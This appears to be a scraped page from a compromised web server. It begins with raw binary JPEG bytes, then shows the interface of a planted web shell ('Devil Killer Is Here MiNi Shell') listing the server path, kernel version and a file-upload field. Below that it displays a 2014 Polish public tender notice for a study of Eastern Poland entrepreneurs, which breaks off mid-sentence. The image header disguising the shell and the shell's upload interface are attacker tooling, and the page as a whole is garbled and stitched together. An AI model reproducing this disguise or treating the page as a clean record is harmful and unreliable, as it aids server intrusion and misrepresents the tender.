JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140407/117402-N-2014.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie badania potrzeb przedsiębiorców w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej w ramach realizacji Programu Promocji Gospodarczej Polski Wschodniej</b><br>
<b>Numer ogłoszenia: 117402 - 2014; data zamieszczenia: 07.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Agencja Informacji i Inwestycji Zagranicznych S.A. , ul. Bagatela 12, 00-585 Warszawa, woj. mazowieckie, tel. 22 3349800, 3349966, faks 22 3349999.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.paiz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie badania potrzeb przedsiębiorców w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej w ramach realizacji Programu Promocji Gospodarczej Polski Wschodniej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia (SOPZ)
1. INFORMACJE OGÓLNE
Makroregion Polska Wschodnia to obszar obejmujący pięć województw: warmińsko-mazurskie, podlaskie, lubelskie, świętokrzyskie i podkarpackie. Obszar ten zajmuje 31,6% powierzchni całego kraju. Według Instytutu Badań nad Gospodarką Rynkową (IBnGR), który regularnie przeprowadza badania na temat atrakcyjności inwestycyjnej polskich regionów, województwa Polski Wschodniej to regiony o niskiej atrakcyjności w większości analizowanych czynników atrakcyjności. Ponadto w przytoczonych wcześniej badaniach   wykazano, iż Polska Wschodnia jest Makroregionem o niskim poziomie rozwoju przemysłu, nieefektywnej strukturze gospodarki, niskiej innowacyjności oraz o małych zasobach wykwalifikowanych pracowników. Na sytuację Makroregionu negatywnie wpływa również jego peryferyjne położenie w stosunku do krajowych i europejskich centrów gospodarczych. Makroregion cechuje wciąż m.in.: niska stopa inwestycji i niewielki napływ inwestycji zagranicznych. Jest to spowodowane przede wszystkim słabą infrastrukturą gospodarczą i społeczną, niewielką chłonnością rynku oraz niewystarczającą aktywnością województw w przyciąganiu inwestorów oraz promocji eksportu. Jednak ostatnie lata, to również czas wzmożonych działań, mających na celu zmniejszenie występujących zapóźnień i barier 
w rozwoju makroregionu. Jednym z dedykowanych instrumentów, które mają temu służyć jest Program Promocji Gospodarczej Polski Wschodniej, realizowany w pierwszej I osi priorytetowej Programu Operacyjnego Rozwój Polski Wschodniej (działania I.4 Promocja i współpraca, poddziałanie 1.4.1 promocja gospodarcza).
Program Promocji Gospodarczej Polski Wschodniej jest pierwszym projektem, który swym zasięgiem obejmuje jednocześnie wszystkie województwa Makroregionu oraz w sposób przemyślany i spójny prezentuje potencjał gospodarczy całego obszaru. Projekt realizowany jest od 2009 roku a jego zakończenie zaplanowano w połowie 2015 r. 
Głównym celem Programu, realizowanego przez Polską Agencję Informacji i Inwestycji Zagranicznych S.A. we współpracy z pięcioma województwami Polski Wschodnie jest wzrost zainteresowania ofertą gospodarczą Polski Wschodniej. Główne założenia Programu obejmują:
- zwiększenie napływu bezpośrednich inwestycji zagranicznych do Makroregionu, 
- zainteresowanie polskich firm inwestycjami w Polsce Wschodniej,
- pobudzenie eksportu produktów oraz usług z Polski Wschodniej,
- rozwój turystyki biznesowej w Makroregionie. 
Program Promocji Gospodarczej Polski Wschodniej składa się z dwóch komponentów: 
1) promocji wizerunkowej Makroregionu Polski Wschodniej oraz poszczególnych województw pod kątem biznesowym (Eastern Poland - Macroregion - Macrofuture). 
Głównym założeniem promocji wizerunkowej jest wypromowanie Makroregionu Polski Wschodniej jako dobrego miejsca do inwestycji oraz atrakcyjnego partnera handlowego. Zadania  promocji wizerunkowej służą wsparciu promocji bezpośredniej. Promocja wizerunkowa obejmie działania o zasięgu ogólnopolskim 
i międzynarodowym: 
- opracowano system identyfikacji wizualnej,
- opracowano materiały promocyjne i informacyjne oraz publikacje,
- zrealizowano kampanię medialną w mediach krajowych i zagranicznych, obecnie trwa realizacja dodatkowej kampanii w mediach zagranicznych, 
- prowadzone są działania Public Relations: wizyty studyjne dziennikarzy zagranicznych, których celem jest obiektywna prezentacja Polski Wschodniej 
w mediach zagranicznych, przeprowadzono cykl konferencji prasowych w trakcie wydarzeń z zakresu badań bezpośrednich, seminaria oraz fora ekonomiczne, których zadaniem jest przedstawienie Programu, efektów jego realizacji oraz przekazanie informacji o możliwościach współpracy gospodarczej z Makroregionem Polska Wschodnia.
2) promocji bezpośredniej wiodących sektorów Polski Wschodnie  wśród potencjalnych inwestorów (polskich i zagranicznych) oraz firm zainteresowanych intensyfikacją współpracy handlowej (promocja typu Business to Business). Działania promocji bezpośredniej polegają na organizacji udziału przedsiębiorców z Polski Wschodniej w handlowych misjach gospodarczych, targach i wystawach międzynarodowych, natomiast w przypadku jednostek samorządu terytorialnego - misjach inwestycyjnych oraz wizytach studyjnych. 
Bezpośrednie działania marketingowe są istotnym element Programu Promocji Gospodarczej Polski Wschodniej, ze względu na:
- możliwość dokładnego dopasowania oferty inwestycyjnej i eksportowej 
do poszczególnych odbiorców,
- potencjalnie większe zainteresowanie ofertą, która jest adresowana do pojedynczych odbiorców lub małej ich grupy,
- możliwość dopasowania narzędzi marketingu pod kątem potrzeb poszczególnych województw (udział w określonych targach, misjach itp.).
Działania promocji bezpośredniej wspierane są narzędziem elektronicznym - portalem gospodarczym www.whyeasternpoland.eu zawierającym zarówno aktualne dane makroekonomiczne, bieżące informacje z Makroregionu, bazę ofert inwestycyjnych oraz aktualną listę planowanych wydarzeń z zakresu działań promocji bezpośredniej (misje, targi). 
2. PRZEDMIOT ZAMÓWIENIA
Przedmiotem zamówienia jest Przeprowadzenie badania potrzeb przedsiębiorców w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej w ramach Programu Promocji Gospodarczej Polski Wschodniej. 
3. UZASADNIENIE, CEL ORAZ ZAKRES BADANIA
Realizacja badania wynika z potrzeby weryfikacji trafności, skuteczności oraz efektywności narzędzi promocji bezpośredniej wykorzystywanych w obecnym Projekcie w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej przy realizacji podobnego programu w nowej perspektywie 2014-2020. 
Bezpośredni wpływ działań promocyjnych na liczbę lokowanych inwestycji w Makroregionie, jest siłą rzeczy ograniczony przez wiele czynników zewnętrznych. Inicjatywy o charakterze promocyjnym stanowią zazwyczaj element wspomagający, nie będąc prawdopodobnie ani warunkiem koniecznym, ani wystarczającym do podjęcia przez inwestorów decyzji o lokacji konkretnej inwestycji na danym obszarze. 
Biorąc pod uwagę dotychczasowe doświadczenia z realizacji Projektu oraz pierwsze efekty interwencji, należy zbadać czy zastosowane formy promocji bezpośredniej w aktualnej postaci są wystarczające i czy odpowiadają potrzebom przedsiębiorców w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej. Udzielenie odpowiedzi w tym zakresie powinno pomóc w kształtowaniu ram i założeń podobnych interwencji w przyszłości. 
Zakres badania koncentrować się będzie na zweryfikowaniu czy zastosowane działania promocji bezpośredniej w Projekcie odpowiadają potrzebom przedsiębiorstw w kontekście internacjonalizacji produktów i/lub usług. 
W ocenie badania będą brane pod uwagę trzy kryteria:
1) Trafność - kryterium trafności ma na celu zbadanie czy cele Projektu, w kontekście samej konstrukcji, są możliwe do osiągnięcia przy pomocy realizowanych działań. Rolą Wykonawcy będzie konfrontacja realizacji celów Projektu za pomocą przyjętych działań, przede wszystkim promocji bezpośredniej, z uwzględnieniem czynników zewnętrznych, które warunkują osiągnięcie założonych celów, z realnymi potrzebami przedsiębiorców w kontekście internacjonalizacji. Z uwagi na fakt, iż Projekt jest w trakcie realizacji, zadaniem badania będzie propozycja modyfikacji zaplanowanych działań pod kątem osiągnięcia założonych celów oraz pomoc 
w kształtowaniu ram i założeń podobnych interwencji w przyszłości. W przypadku zaistnienia ostatniej z okoliczności, Wykonawca przedstawi własną, przykładową propozycję modyfikacji celów Projektu na potrzeby analogicznych działań realizowanych w kolejnym okresie programowania.
2) Skuteczność - kryterium skuteczności wymaga sporządzenia bilansu zamierzonych 
i osiągniętych efektów Projektu oraz sprawdzenia czy prowadzone działania promocji bezpośredniej (przede wszystkim ich forma i kierunki promocji) spełniają oczekiwania przedsiębiorców Polski Wschodniej. Ważne będzie ustalenie związków pomiędzy przyjętymi działaniami i ich konstrukcją, a powodzeniami i niepowodzeniami w zakresie zaplanowanych rezultatów i oddziaływania w kontekście internacjonalizacji przedsiębiorstw. 
3) Efektywność - w ramach tego kryterium istotne będzie ustalenie jak efektywnie nakłady zostały przekształcone w poszczególne produkty, rezultaty i oddziaływanie. Analizą efektywności objęte będą działania z obszaru promocji bezpośredniej, 
tj. misje wyjazdowe i przyjazdowe, targi, wystawy oraz wizyty studyjne. 
4. PROBLEMY I OBSZARY BADAWCZE
W związku z tym, iż zakres badania koncentrować się będzie na zweryfikowaniu czy zastosowane działania promocji bezpośredniej w Projekcie odpowiadają potrzebom przedsiębiorstw w kontekście internacjonalizacji przedsiębiorstw Polski Wschodniej, koniecznym będzie znalezienie odpowiedzi na pytania sformułowane w dwóch obszarach badawczych. Poniższe pytania mają charakter poglądowy, w celu ukierunkowania Wykonawcy przy przygotowaniu szczegółowych pytań, które zostaną przedstawione do akceptacji Zamawiającego po podpisaniu umowy. Przykłady zagadnień:
1) Ocena działań z zakresu promocji bezpośredniej oraz dotychczasowych efektów realizacji Programu Promocji Gospodarczej Polski Wschodniej, w tym oceny jakości jego realizacji oraz osiągniętych wskaźników w kontekście realizacji podobnego Programu w nowej perspektywie 2014-2020:
- czy promocja Programu dociera do potencjalnych i faktycznych przedsiębiorców?
- w jakim stopniu promocja bezpośrednia Projektu jest skuteczna, tj. w jakim stopniu zachęca potencjalnych przedsiębiorców (w tym inwestorów krajowych i zagranicznych) do:
a. ulokowania swojej inwestycji na terenie Polski Wschodniej? 
b. zwiększenia udziału eksportu w ogólnej wartości sprzedaży? 
-  które elementy realizowanego Programu są najbardziej skuteczne z punktu widzenia przedsiębiorców? Jak oceniana i postrzegana jest skuteczność poszczególnych rodzajów przedsięwzięć promocji bezpośredniej (z listy zawartej w tabeli 1, stanowiącej załącznik nr 1 do SOPZ) w zakresie nawiązania i realizacji kontaktów handlowych?
- jaka jest ocena najbardziej efektywnych kierunków (rynków) współpracy gospodarczej z punktu widzenia przedsiębiorców z poszczególnych branż wiodących z Polski Wschodniej?
- jak oceniana jest skuteczność prowadzonych działań promocyjnych pod kątem rozwoju przedsiębiorczości i wymiany handlowej wśród przedsiębiorców Polski Wschodniej?
- jaki jest deklaratywny poziom zainteresowania handlem z rynkiem Polski Wschodniej?
- jakie są opinie dotyczące kanałów i narzędzi promocji Polski Wschodniej?
2) Ocena trafności oraz skuteczności zastosowanych działań promocji bezpośredniej Projektu w stosunku do potrzeb przedsiębiorców Polski Wschodniej, w szczególności w kontekście internacjonalizacji: 
- które z poszczególnych rodzajów przedsięwzięć promocji bezpośredniej Projektu 
są najbardziej, a które najmniej trafne z punktu widzenia potrzeb przedsiębiorców Polski Wschodniej?
- w jakim stopniu działania promocji bezpośredniej Projektu (misje/targi/wizyty studyjne) odpowiadają potrzebom przedsiębiorców Polski Wschodniej?
- czy można porównać skuteczność i efektywność (koszty do efektów) misji/targów/ wizyt studyjnych organizowanych w ramach Projektu z analogicznymi przedsięwzięciami, organizowanymi w ramach innych inicjatyw?
- czy zastosowane formy promocji (misje/targi/wizyty) są wystarczające z punktu widzenia przedsiębiorców, w szczególności w kontekście internacjonalizacji? Jeżeli nie, to które formy promocji powinny być uwzględnione w nowej perspektywie 2014-2020?
- czy dobór kierunków (rynków) współpracy gospodarczej odpowiada potrzebom przedsiębiorców z poszczególnych branż wiodących z Polski Wschodniej? Jeżeli nie, to które kierunki współpracy gospodarczej powinny być uwzględnione w nowej perspektywie 2014-2020?
- czy zastosowane formy wsparcia są wystarczające i odpowiadają potrzebom przedsiębiorców? Jeżeli nie, to jakie formy wsparcia powinny być uwzględnione w nowej perspektywie 2014-2020?
5. WYMAGANIA DOTYCZĄCE METODOLOGII BADANIA
Wykonawca przeprowadzi wszystkie niezbędne czynności związane z powierzonym mu zadaniem zgodnie z powszechnie respektowanymi regułami metodologicznymi obowiązującymi w naukach społecznych. Wielowymiarowość celów badania oraz wielość zagadnień sugeruje zastosowanie hybrydowej metodologii badań społecznych, bazującej na integracji metod kwantyfikacyjnych z treściowymi. 
Zamawiający przewidział następujące elementy badania:
I. DESK RESEARCH 
Pierwszym etapem badań będzie analiza źródeł zastanych. Istotne będzie zapoznanie 
się Wykonawcy z dokumentacją programową oraz materiałami wypracowanymi do tej pory w postaci analizy gospodarczej, raportów oraz badań ewaluacyjnych. Na tym etapie Wykonawca powinien również przeprowadzić szereg rozmów z osobami zaangażowanymi w realizację Projektu, w tym z przedstawicielami Zamawiającego, MRR i PARP. Celem przeprowadzonych rozmów powinno być poszerzenie wiedzy na temat analizowanej interwencji oraz identyfikacja danych, które mogą okazać się użyteczne z punktu widzenia postawionych pytań badawczych. 
Konsekwencją realizacji tego etapu, będzie opracowanie i zaakceptowanie raportu metodologicznego, w tym przygotowanie narzędzi badawczych w postaci kwestionariuszy wywiadu dla badań ilościowych oraz scenariuszy wywiadu na potrzeby badań jakościowych.
II. BADANIA TERENOWE ILOŚCIOWE I JAKOŚCIOWE
Badanie będzie miało na celu umożliwić udzielenie odpowiedzi przede wszystkim na pytania wskazane powyżej, w ramach pierwszego i drugiego obszaru badawczego. 
1) Pierwszy obszar badawczy - główne założenia:
- Wykonawca zrealizuje badanie z wykorzystaniem jednej z wybranych technik badawczych: CAPI, PAPI lub CATI. Istotne jest, iż Zamawiający dysponuje bazą adresową do podmiotów gospodarczych (w bazie znajdują się dodatkowo numery NIP/REGON, które w razie potrzeby pozwolą na zintegrowanie wykazu 
z innymi bazami danych kontaktowych, w szczególności z bazą telefoniczną).
- Zamawiający po podpisaniu umowy przekaże Wykonawcy wykaz podmiotów 
do badania liczący 3 000 jednostek, z których Wykonawca wylosuje próbę badawczą nie mniejszą niż  1 000 respondentów.
- Wymagany, minimalny poziom zwrotu (respose rate) w badaniu wynosi 50% 
(500 podmiotów, z którymi zrealizowany został pełen wywiad). Każde odstępstwo od tej wielkości będzie skutkowało naliczeniem kar umownych, o których mowa 
w par. 16 umowy).
- Realizacja badania będzie miała charakter badania wyczerpującego - tzn. Zamawiający wymaga podjęcia kontaktu i próbę realizacji wywiadu z każdym respondentem w przekazanej próbie badawczej. 
- Wszystkie wywiady zostaną przeprowadzone z przedstawicielem Zarządu przedsiębiorstwa lub osobą na stanowisku kierowniczym, posiadającym niezbędną wiedzę w zakresie prowadzonego badania.
- Zamawiający zastrzega sobie prawo do kontroli poprawności zrealizowanych wywiadów w ramach kontroli własnej PAIiIZ S.A.
2) Drugi obszar badawczy - główne założenia:
- Wykonawca przeprowadzi wywiady jakościowe w formule Indywidualnych Wywiadów Pogłębionych (IDI) oraz 3 wywiady grupowe (grupy fokusowe) 
z krajowymi podmiotami prowadzącymi działalność gospodarczą, zarejestrowanymi na terenie województw Polski Wschodniej (411 podmiotów), uczestniczącymi 
w dotychczasowych wydarzeniach z zakresu promocji bezpośredniej. Istotne jest, 
iż Zamawiający posiada jedynie bazę adresową podmiotów gospodarczych 
(w bazie znajdują się dodatkowo numery NIP/REGON, które w razie potrzeby pozwolą na zintegrowanie wykazu z innymi bazami danych kontaktowych, w szczególności z bazą telefoniczną).
- Zamawiający po podpisaniu umowy przekaże Wykonawcy wykaz podmiotów 
do badania liczący 411 jednostek.
- Wymagany, minimalny poziom zwrotu (respose rate) dla IDI wynosi 25% 
(103 podmioty, z którymi zrealizowany został pełen wywiad). Natomiast próba badawcza dla grup fokusowych to nie mniej niż 8 uczestników wylosowanych 
z wykazu podmiotów do badania liczącego 411 jednostek. Każde odstępstwo od tej wielkości będzie skutkowało naliczeniem kar umownych, o których mowa 
w par. 16 umowy).
- Na potrzeby wywiadów Wykonawca opracuje odpowiednie kwestionariusze/scenariusze.
- Wszystkie wywiady zostaną przeprowadzone z przedstawicielem Zarządu przedsiębiorstwa lub osobą na stanowisku kierowniczym, posiadającym niezbędną wiedzę w zakresie udziału podmiotu w danym wydarzeniu.
- Z każdego wywiadu sporządzone zostanie szczegółowe sprawozdanie, zawierające zestawienie pytań zawartych w scenariuszu wywiadu i uzyskanych na nie odpowiedzi.
- Zamawiający zastrzega sobie prawo do kontroli poprawności zrealizowanych wywiadów w ramach kontroli własnej PAIiIZ S.A.
6. ZAKRES RAPORTU METODOLOGICZNEGO
Raport metodologiczny powinien zawierać następujące elementy:
1) szczegółowy opis koncepcji i metodologii (metod, technik, narzędzi) realizacji badania,
2) kwestionariusze wywiadu do badań ilościowych;
3) scenariusze wywiadów - zgodnie ze wskazanymi założeniami;
4) listę osób, z którymi zostaną przeprowadzone wywiady IDI i grupy fokusowe;
5) szczegółowy harmonogram realizacji badań i analiz;
6) propozycję spisu treści raportu końcowego;
7) zakresy odpowiedzialności poszczególnych ekspertów, w ramach zespołu badawczego.
7. ZAKRES RAPORTU KOŃCOWEGO
1) Wykonawca przygotuje raport końcowy prezentujący wyniki badań. Otrzymane wyniki powinny zostać omówione w sposób syntetyczny i przekrojowy. Raport nie może sprowadzać się do zreferowania (streszczenia) uzyskanych danych i odpowiedzi pochodzących z badań, lecz powinien być syntezą wyników uzyskanych na różnych etapach realizacji badania. 
2) Do zaprezentowania materiału empirycznego Wykonawca powinien wybrać takie przekroje analityczne (typologie), które będą zapewniały prawidłowe wnioskowanie (będą istotne z punktu widzenia zaobserwowanych prawidłowości).
3) Raport końcowy będzie zawierał co najmniej następujące elementy: 
- streszczenie,
- kontekst realizacji badania,
- opis metodologii badania,
- wnioski z badania i rekomendacje,
- syntetyczne odpowiedzi na wszystkie postawione pytania ewaluacyjne. 
4) Do raportu końcowego będą dołączone aneksy, tworzone przez Wykonawcę na bieżąco w toku realizacji niniejszego Zamówienia, w szczególności:
- szczegółowy opis metodologii zastosowanej w badaniu,
- lista jednostek, z którymi przeprowadzono wywiady,
- lista dokumentów, publikacji i innych materiałów źródłowych, wykorzystanych przy ewaluacji,
- Aneks statystyczny zawierający tabelaryczną prezentację wyników badań ilościowych, w wyznaczonych po konsultacji z Zamawiającym przekrojach analitycznych,
- narzędzia badawcze zastosowane w wywiadach,
- informacja dla prasy streszczająca najważniejsze wnioski i wyniki badania (maksymalnie dwie strony maszynopisu, około 1 800 znaków na stronę).
5) Raport powinien zawierać nie więcej niż 100 stron maszynopisu, w tym streszczenie (nie więcej 5-10 str.), około 1 800 znaków na stronę. Oba raporty (metodologiczny i końcowy) będą przygotowane w języku polskim. W raporcie końcowym Wykonawca powinien zamieścić logo Projektu, Unii Europejskiej i PO RPW oraz informację, że raport powstał w ramach projektu współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego. 
6) Prezentowane w raporcie informacje powinny zachować spójny wygląd i treść (w szczególności tabele i wykresy). Ponadto, szata graficzna obu raportów powinna być zgodna z Poradnikiem Beneficjenta - Zasady promocji projektów dla Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013 oraz Księgą Identyfikacji Wizualnej Narodowej Strategii Spójności na lata 2007-2013. Ponadto, raporty oraz prezentacje przygotowane w ramach zamówienia będą zgodne z zasadami wizualizacji Projektu.
7) Wykonawca dostarczy oba raporty (końcowy i metodologiczny) w wersji elektronicznej (CD/DVD/pendrive oraz za pośrednictwem poczty elektronicznej; formaty: .doc, docx oraz PDF) oraz papierowej (zbindowane, wydruk w kolorze) 
w liczbie pięciu egzemplarzy (dotyczy wersji finalnej). Wersja robocza raportu końcowego zostanie dostarczona w wersji elektronicznej (CD/DVD/pendrive oraz za pośrednictwem poczty elektronicznej; formaty: doc, docx oraz PDF) oraz papierowej (zbindowane, wydruk w kolorze) w liczbie trzech egzemplarzy.
8) Załącznikiem do raportu będą bazy danych pochodzące z badań ilościowych zapisane w programie Excel.
9) Wykonawca przedstawi dodatkowo do raportu prezentację w programie Power Point, w której w sposób obrazowy i atrakcyjny pokaże wyniki badania. Prezentacja od 25 do 30 slajdów w wersji polskiej i angielskiej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.30.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na mocy art. 45 ust. 2 ustawy Pzp Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 5 usług odpowiadających swoim rodzajem przedmiotowi zamówienia, w tym co najmniej: 
a) dwie usługi polegające na przeprowadzeniu badania ewaluacyjnego lub marketingowego, każde o wartości brutto min. 150.000,00 zł. (a w przypadku, jeśli wartość usługi była w umowie wyrażona w walucie obcej - równowartość 150.000,00 złotych ustala się w. średniego kursu NBP z dnia zawarcia umowy o wykonanie usługi);
b) dwie usługi polegające na realizacji badań na próbie przedsiębiorstw, z wykorzystaniem jednej z następujących technik badawczych: CAPI (wspomagane komputerowo wywiady osobiste), PAPI (ankieterskie wywiady osobiste) lub CATI (wspomagane komputerowo wywiady telefoniczne). Próba badawcza w każdym z badań była nie mniejsza niż 700 jednostek badawczych;
c) badanie fokusowe lub równoważne jakościowe.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż dysponuje lub będzie dysponować:
a) Kierownikiem, który:
- posiada wyższe wykształcenie,
